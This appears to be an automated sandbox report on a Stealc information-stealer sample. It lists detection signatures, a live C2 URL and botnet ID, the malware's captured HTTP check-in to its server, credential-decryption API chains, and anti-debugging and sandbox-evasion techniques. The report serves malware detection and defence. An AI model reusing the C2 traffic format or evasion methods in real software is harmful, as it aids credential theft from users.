Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524420
MD5: 9267e551326d9f70ca969543647f060b
SHA1: 19a3f3bff029fb895b5d256d6d6a4cce1e5d8a85
SHA256: 4ffb89ed6560f1f1e8c683cd4451982c9588cf8ac2846f652ba88e611dc639bd
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1164 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9267E551326D9F70CA969543647F060B)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development drew on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches

Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1164 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 1164 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.file.exe.f00000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Sigma matches

No Sigma rule has matched

Suricata IDS alerts

Timestamp: 2024-10-02T19:07:57.397568+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.f00000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F09AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F07240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F09B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F18EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE
  Host: 185.215.113.37
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 46 42 30 32 30 37 43 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a
  Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"F77FB0207C0F807656615------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F04880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE
  Host: 185.215.113.37
  Content-Length: 210
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 46 42 30 32 30 37 43 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a
  Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"F77FB0207C0F807656615------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--
Source: file.exe, 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpTW
Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpxv
Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name: (special chars, not rendered)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (special chars, not rendered)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BB192
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012BF1CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0121B8D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012410DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C322F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01362A9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0123DAE4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01231DCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01345C38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C9C1C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0129C4BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C175A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012ADE23
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118DE78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012CB6B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013686EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01360ECE
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00F045C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xmtfkgun ZLIB complexity 0.9947668224116359
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F18680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F13720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\C411JGDX.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1793024 > 1048576
Source: file.exe | Static PE information: Raw size of xmtfkgun is bigger than: 0x100000 < 0x18fa00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.f00000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xmtfkgun:EW;toxpwvxv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xmtfkgun:EW;toxpwvxv:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bb8f1 should be: 0x1c35f2
Source: file.exe | Static PE information: section name: (special chars, not rendered)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (special chars, not rendered)
Source: file.exe | Static PE information: section name: xmtfkgun
Source: file.exe | Static PE information: section name: toxpwvxv
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133D11F push 0755C316h; mov dword ptr [esp], edx (at 0_2_0133D146)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133810A push esi; mov dword ptr [esp], edx (at 0_2_01338156)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136794A push ebp; mov dword ptr [esp], 6BC3CA82h (at 0_2_01367984)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136794A push eax; mov dword ptr [esp], ecx (at 0_2_01367A0D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BE99E push ebx; mov dword ptr [esp], ecx (at 0_2_011BEA0C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BE99E push ebx; mov dword ptr [esp], eax (at 0_2_011BEA56)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BE99E push 573C248Eh; mov dword ptr [esp], ecx (at 0_2_011BEAAC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011BE99E push ecx; mov dword ptr [esp], edx (at 0_2_011BEB22)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BB192 push edi; mov dword ptr [esp], ecx (at 0_2_013BB276)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BB192 push esi; mov dword ptr [esp], eax (at 0_2_013BB28C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013BB192 push edx; mov dword ptr [esp], 1207F155h (at 0_2_013BB2A8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push 2971D7EEh; mov dword ptr [esp], ebp (at 0_2_012C81B4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push edx; mov dword ptr [esp], 2D1A8914h (at 0_2_012C81CB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebp; mov dword ptr [esp], esi (at 0_2_012C81EA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebp; mov dword ptr [esp], 7EE7E611h (at 0_2_012C820A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push edx; mov dword ptr [esp], eax (at 0_2_012C8254)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push 61F7E6F3h; mov dword ptr [esp], edi (at 0_2_012C82B6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebx; mov dword ptr [esp], 1093CAA1h (at 0_2_012C82E3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebx; mov dword ptr [esp], edx (at 0_2_012C82EE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push edx; mov dword ptr [esp], edi (at 0_2_012C82FF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebp; mov dword ptr [esp], eax (at 0_2_012C8366)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebp; mov dword ptr [esp], edx (at 0_2_012C8386)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push 30A3B386h; mov dword ptr [esp], esi (at 0_2_012C83B5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push eax; mov dword ptr [esp], 76FFBFC7h (at 0_2_012C8498)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push esi; mov dword ptr [esp], 3B7D5FBBh (at 0_2_012C84E5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebx; mov dword ptr [esp], edx (at 0_2_012C8713)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push 37D27409h; mov dword ptr [esp], edi (at 0_2_012C879C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push ebp; mov dword ptr [esp], 50C93677h (at 0_2_012C882A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push 4127DC00h; mov dword ptr [esp], eax (at 0_2_012C8862)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push 36E5EE3Ah; mov dword ptr [esp], ebp (at 0_2_012C886F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012C8186 push 2172076Bh; mov dword ptr [esp], esi (at 0_2_012C89DE)
Source: file.exe | Static PE information: section name: xmtfkgun entropy: 7.9523327915554285

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13639)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C481F second address: 12C4823 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C4823 second address: 12C4827 instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C4827 second address: 12C482D instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 push eax; 0x00000005 push edx; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C482D second address: 12C4843 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 jmp 00007FF674E409BAh; 0x0000000b push eax; 0x0000000c push edx; 0x0000000d pushad; 0x0000000e popad; 0x0000000f push eax; 0x00000010 push edx; 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C4843 second address: 12C4847 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C4847 second address: 12C484B instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D05C7 second address: 12D05CF instructions: 0x00000000 rdtsc; 0x00000002 push ebx; 0x00000003 pop ebx; 0x00000004 pushad; 0x00000005 popad; 0x00000006 pop edx; 0x00000007 pop eax; 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0735 second address: 12D0759 instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 jno 00007FF674E409B6h; 0x00000009 jmp 00007FF674E409C7h; 0x0000000e popad; 0x0000000f push esi; 0x00000010 push eax; 0x00000011 push edx; 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D376A second address: 12D376E instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D376E second address: 12D3825 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 popad; 0x00000007 push eax; 0x00000008 jnl 00007FF674E409C4h; 0x0000000e nop; 0x0000000f or dword ptr [ebp+122D35B9h], edi; 0x00000015 push 00000000h; 0x00000017 sub dword ptr [ebp+122D17A3h], edi; 0x0000001d push B3E9FC2Ch; 0x00000022 jmp 00007FF674E409C5h; 0x00000027 add dword ptr [esp], 4C160454h; 0x0000002e mov edi, ecx; 0x00000030 push 00000003h; 0x00000032 mov si, FF1Ah; 0x00000036 push 00000000h; 0x00000038 cld; 0x00000039 push 00000003h; 0x0000003b push B4A11D71h; 0x00000040 jmp 00007FF674E409C8h; 0x00000045 xor dword ptr [esp], 74A11D71h; 0x0000004c jmp 00007FF674E409C0h; 0x00000051 mov esi, edi; 0x00000053 lea ebx, dword ptr [ebp+12445388h]; 0x00000059 mov esi, 5DF655EFh; 0x0000005e push eax; 0x0000005f pushad; 0x00000060 jmp 00007FF674E409C8h; 0x00000065 pushad; 0x00000066 push eax; 0x00000067 push edx; 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BF7C7 second address: 12BF7FD instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 jmp 00007FF6744C8CA6h; 0x00000009 jmp 00007FF6744C8CA3h; 0x0000000e popad; 0x0000000f jl 00007FF6744C8C9Eh; 0x00000015 push eax; 0x00000016 push edx; 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2AD0 second address: 12F2AD6 instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 push eax; 0x00000005 push edx; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2AD6 second address: 12F2AE0 instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 jno 00007FF6744C8C96h; 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F2AE0 second address: 12F2AE4 instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
